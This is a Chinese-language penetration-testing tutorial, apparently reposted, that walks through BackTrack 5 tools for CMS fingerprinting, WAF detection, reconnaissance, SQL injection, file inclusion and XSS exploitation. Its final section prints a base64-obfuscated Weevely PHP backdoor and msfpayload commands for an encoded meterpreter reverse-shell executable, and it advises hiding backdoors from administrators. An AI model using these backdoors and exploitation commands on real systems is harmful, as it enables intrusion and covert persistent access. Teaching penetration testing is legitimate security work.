用Backtrack进行渗透测试评估
Web应用程序的分析在渗透测试和漏洞评估中发挥了重要的作用.确定Web应用程序的正确信息(例如使用的插件,CMS类型等)都可以帮助测试者使用准确的漏洞来测试,能够降低整个渗透测试漏洞评估所花费的时间.
Backtrack 5包含很多渗透测试信息收集所需要的工具.主要有以下几个方面:
CMS Identification(CMS指纹鉴定)
IDS/IPS Detection(IDS/IPS的检测)
Open Source Analysis(开源分析)
Web Crawlers(网络爬虫)
Vulnerability Assessment and Exploitation(脆弱性评估和开发)
Maintaining Access(维护访问)
1)CMS Identification(CMS指纹鉴定):
blindelephant
cms-explorer
whatweb
BlindElephant
BlindElephant是一款基于python的Web应用程序指纹识别工具.这款工具通过扫描某些已知位置的静态文件所使用的版本信息和hashes文件进行比对.Hashes文件中已经提前计算了相关Web应用程序的版本信息.
这款工具的优势是快速,非侵入性,低带宽和高度自动化
使用方法:
BlindElephant.py [options] url appName
不知道Web应用程序或者插件的类型,我们可以用猜测的方法.例如;
BlindElephant.py http://www.nxadmin.com wordpress
CMS-Explorer
CMS- Explorer是另外一款Web应用程序指纹识别工具,是用perl脚本编写的.它可以确定使用的CMS类型,然后根据已知的漏洞资料进行攻击.这款工 具有几个优势,可以从OSVDB(Open Source Vulnerability Database)中调用漏洞信息检查任何特定插件或者CMS是否存在漏洞.
使用方法:
# python cms-explorer.pl -url target -type type [options]
WhatWeb
WhatWeb可以用来确定服务器使用的CMS、博客平台、统计分析软件包、JavaScript库等.这个工具有超过900个插件用来扫描目标.
使用方法:
# ./whatweb nxadmin.com
列出所有的插件用如下命令:
# ./whatweb -l
2)IDS/IPS detection(IDS/IPS探测):
在域环境下进行风险评估和渗透测试的时候,有可能会遇到有安装IDS/IPS的情况.IDS/IPS有些时候能组织针对域环境的攻击.WAF(Web入侵防御系统)能很好的缓解入侵攻击.
但是WAF是很容易能够检测到的,因为很多使用了基于签名的检测方法,因此攻击者可以通过对攻击参数进行编码来绕过WAF.Backtrack有两款检测IDS/IPS的工具:
waffit
ua-tester
Waffit
Waffit是一款Web应用防火墙检测工具,检测防火墙保护的站点是在渗透测试中非常重要的一步.如果没有对WAF进行配置,有时候可能存在漏洞.在渗透测试和风险评估中分析WAF也是非常重要的.通过编码攻击参数,可以绕过WAF.
使用方法:
wafw00f.py http://www.target.com/
3)Open-Source Analyses(开源代码分析):
Open-Source Analyses(开放源码分析)可以使用GHDB,revhosts,xssed,maltego.GHDB和XSSed需要进入网站,其它的两款是工具.
GHDB
GHDB(Google Hacking Database)的exploit-db的团队收集了大量漏洞信息库来方便渗透测试人员.我们可以用服务器类型等信息来寻找相关的漏洞.
例如: “Microsoft-IIS/6.0 intitle:index.of”可以用来搜索运行微软iis6.0的服务器.
XSSED
XSSED是另外一个包含大量具有跨站漏洞网站名单的网站,由不同的作者提交.渗透测试人员可以在XSSED的数据库中搜索他们的目标网站,有助于渗透测试和风险评估.
Revhosts
Revhosts是一个被动的信息收集项目,是由python编写的,同样的可以帮助渗透测试人员收集主机,虚拟主机,DNS条目,目录,电子邮件地址,子网等信息.
4)Web Crawlers(网站抓取):
Backtrack 5中有一款Web应用程序分析的网络爬虫工具webshag,它是基于GUI和控制台的程序.可以用来扫描http和https的web服务器,通过代理使用http认证.
webshag有端口扫描,信息收集,爬虫,模糊查询等.
下载地址:http://www.scrt.ch/en/attack/downloads/webshag
5)Vulnerability Assessment and exploitation(风险评估和利用)
风 险评估是针对我们扫描到的任何漏洞和BUG进行评估,做风险评估之前收集到有关的目标信息是非常有帮助的.信息收集阶段是进一步攻击之前的关键一步,使用 工具会让这项工作比较容易.例如在第一阶段,使用BlindElepha进行CMS的扫描,发现已经安装的应用程序版本是Joomla.在风险评估阶段就 可以使用像joomscan来扫描特定的漏洞.如下图:
使用方法:
./joomscan.pl –u www.nxadmin.com or IP address
joomscan可以扫描到安装的所有插件和相关的漏洞信息,利用这些信息我们可以进一步进行攻击.
sqlmap
sqlmap是一款很不错的进行风险评估的工具.这款工具可以测试目标URL是否存在脆弱性漏洞.下面这个例子中红色框中的参数”Newid”是具有脆弱性漏洞的.使用方法如下:
./sqlmap.py –u nxadmin.com -f
Fimap
Fimap是一款基于python的工具,可以用来发现,代码审计,漏洞利用等.
使用方法:
fimap -u http://www.example.com/index.php?inc=index.php
-u 定义目标URL
扫描一个文本中的所有URL列表,命令如下:
fimap -m -l ‘/tmp/urlscan.txt’
-m 批量扫描
-l 列表
使用google批量搜索来扫描
fimap.py -g -q ‘inurl:include.php’
-g 从Google搜索
-q 表示后面跟的是谷歌搜索的查询条件
fimap可以利用目标漏洞,同时也可以上传交互式的shell.
Xsser
Xsser是一款自动的XSS漏洞检测和利用报告的框架.它配备了绕过过滤器和其它注射方式的选项.
使用方法:
./XSSer.py -u “http://www.target.com” -g “Search.php?tfSearch=”–referer”666.666.666.666″ –user-agent”correctaudit”
这款工具提供了攻击的URL,浏览器和攻击方法等信息,一旦具有漏洞URL被检测完成,我们可以打开网站,检查确认.
theHarvestor
theHarvestor工具用于收集用户的姓名,他们的电子邮件账户,主机名等信息,这款工具有助于渗透测试人员在渗透测试和风险评估的初始阶段使用.
使用方法:
./theHaervester.py –ld [target domain] –d [ data source]
正在提取域和电子邮件相关的网站信息,可以帮助对有关目标的进一步攻击或研究.
Shodan
这是另外一款非常不错的评估工具,可以用来收集目标范围内的信息,比如链接在互联网上的设备,可以搜索任何网络设备,如路由器,网络电话,打印机,摄像等.要搜索在域上运行的任何服务,语法如下:
Hostname:target.com port:80,21,22
或者干脆有关主机名的结果,如:
Hostname:target.com
W3AF
W3af是web代码审计和应用程序渗透测试工具。它分很多个模块,如攻击,审计,开发,暴力破解.所以这些都是可以针对性的使用,例如我们可以选择审计模块的sqli选项,假设我们需要执行审计类的特殊任务.
下图显示了一个目标网站的简要流程图,使得我们更容易理解.
一旦扫描完成,W3AF框架显示有关目标网站的漏洞信息,可以为进一步开发针对性的漏洞利用工具提供帮助.
一旦发现漏洞,我们可以配置插件中的”Exploit”标签,并进行进一步的攻击,它可以帮助我们得到一个目标网站的webshell.另外一个优点是w3af也是Metasploit下的一款工具,扫描的结果可以导出为HTML的格式.
6)Maintaining Access(维持访问):
我们获取一个目标网站的权限之后,为了方便将来访问,我们需要保留一个后门,后门加密编码非常的重要,主要是为了防止被管理员轻易的检测清除掉.
Backtrack 5中上传webshell的经典工具有以下几款:
weevely
Weevely 是一款隐蔽的PHP后门.它提供一个类似telnet的链接,链接之后可以执行系统的一些命令.使用动态探测系统绕过PHP的安全性限制.Weevely 探测system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()这些函数,使用在远程服务器上启用的函数功能.下面的代码是使用weevely创建一个后门的示例代码:
eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30=’));
使用方法:
创建一个后门
Weevely.py –g –o filename –p password
这样将创建一个具有特定名称和密码保护的后门,上传到目标服务器使用如下命令;
Weevely.py -t -u http://remote-ip/backdoor.php -p infosec
MsfPayload
Metasploit工具可以用来创建后门,能够维持我们对目标服务器的访问.需要使用到msfpayload这款工具.
我们需要选择有效载荷,将通过反向链接生成一个shell,命令如下:
msf > msfpayload windows/meterpreter/reverse_tcp -R来给输出文件RAW数据格式.
Msf > msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R
Msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R| msfencode –e x86/shikata_ga_nai –t exe >> infosec.exe
-e可以用来指定需要的编码类型,这本例中使用的shikata_ga_nai编码,-t指定输出文件扩展名类型,本例中为.exe。
总 结,以上只不过是几种Web应用程序漏洞利用发现的方法,一旦我们获取有关的信息,我们可以针对Web应用程序进行风险评估,来获得相关的漏洞信息,利用 这些漏洞有必要的话可以上传后门.正如文章提到的,最好是经过加密编码的后门,防止被检测到.希望本文有助于你渗透测试,以及后门权限的保持.
原文链接:
http://resources.infosecinstitute.com/web-analysis-bt-5/
http://www.nxadmin.com/penetration/787.html
用Backtrack进行渗透测试评估的更多相关文章
- 渗透测试(PenTest)基础指南
什么是渗透测试? 渗透测试(Penetration Test,简称为 PenTest),是指通过尝试利用漏洞攻击来评估IT基础设施的安全性.这些漏洞可能存在于操作系统.服务和应用程序的缺陷.不当配置或 ...
- Zigbee安全基础篇Part.3
原文地址: https://www.4hou.com/wireless/14294.html 导语:在之前的文章中提供了ZigBee协议及其安全功能的简要概述.在本文中,我们将探讨可在ZigBee网络 ...
- 在vps上安装 kali linux
在渗透测试过程中,很多时候我们需要反弹一个shell回来.使用empire也好,MSF也好,其他工具也好,都避不开公网IP的问题.这时候我们就需要一个VPS来进一步进行渗透测试. 建立通道连接的方式有 ...
- backtrack渗透测试中常用的命令总结
ping 域名/ip 测试本机到远端主机是否联通. dig 域名/ip 查看域名解析的详细信息. host -l 域名 dns服务器 传输zone. 扫描 nmap: -sS 半开扫描TCP和SYN扫 ...
- Web渗透测试使用Kali Linux(一)渗透测试概要及环境部署
渗透测试是利用已经发现的漏洞,采用恶意黑客的惯用手段来尝试对漏洞进行攻击. Kali Linux是BackTrack的进化版,是Linux的衍生版本,专门开发用作渗透测试,其中提供了很多的渗透测试工具 ...
- 安装Kali Linux操作系统Kali Linux无线网络渗透
安装Kali Linux操作系统Kali Linux无线网络渗透 Kali Linux是一个基于Debian的Linux发行版,它的前身是BackTrack Linux发行版.在该操作系统中,自带了大 ...
- 全球著名的渗透测试Linux简介
注:如发现链接无法打开,请尝试代理登录链接 1. Kali Linux Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试.由Offensive Security ...
- 玩转渗透神器Kali:Kali Linux作为主系统使用的正确姿势TIPS
Kali Linux 前身是著名渗透测试系统BackTrack ,是一个基于 Debian 的 Linux 发行版,包含很多安全和取证方面的相关工具. 本文假设你在新装好的kali linux环境下… ...
- [经验分享] OSCP 渗透测试认证
http://f4l13n5n0w.github.io/blog/2015/05/05/jing-yan-fen-xiang-oscp-shen-tou-ce-shi-ren-zheng/ “120天 ...
随机推荐
- 关于Java中Arrays.sort()方法TLE
最近一直在练用Java写题,今天无意发现一道很简单的二分题(链接),我一开始是直接开int[]数组调用Arrays.sort()去排序,没想到TLE了,原来是因为jdk中对于int[]的排序是使用快速 ...
- 用户登录(Material Design + Data-Binding + MVP架构模式)实现
转载请注明出处: http://www.cnblogs.com/cnwutianhao/p/6772759.html MVP架构模式 大家都不陌生,Google 也给出过相应的参考 Sample, 但 ...
- Linux基础(7)
Linux 基础(7) 一.内存的监控(free) free -m 以单位为MB的方式查看内存的使用情况(free命令读取的文件是/proc/meminfo) total:是指计算机安装的内存总量 u ...
- bzoj4652 [Noi2016]循环之美
Description 牛牛是一个热爱算法设计的高中生.在他设计的算法中,常常会使用带小数的数进行计算.牛牛认为,如果在k进制下,一个数的小数部分是纯循环的,那么它就是美的.现在,牛牛想知道:对于已知 ...
- Ruby读excel写入mysql
安装mysql2 打开cmd: gem install mysql2 代码 require 'win32ole' require 'mysql2' class String def addslashe ...
- 蓝桥杯-凑算式-java
/* (程序头部注释开始) * 程序的版权和版本声明部分 * Copyright (c) 2016, 广州科技贸易职业学院信息工程系学生 * All rights reserved. * 文件名称: ...
- 纯css实现翻牌特效
大家有没有看到过网上很炫的翻牌效果,牌正面对着我们,然后点击一下,牌就被翻过来了,效果很酷炫,是不是很想知道是怎么实现的么,代码很简单,跟着小编往下走. 先给大家介绍一下翻牌的原理: 1.父容器设置设 ...
- Bash 的若干基本问题
Bash 的若干基本问题 这里介绍一些bash启动前.后的问题,以及一些使用bash需要注意的基本问题. 1.Bash的介绍 Bash是一种Shell程序,它是一般的Linux系统中的 ...
- jenkins部署
第一步:官网下载jenkins:http://Jenkins-ci.org/ 第二步:安装jdk:(参考jdk安装)http://www.cnblogs.com/tanghuang/p/5805514 ...
- redis的主从复制
一.主从复制概述 二.主从复制的过程: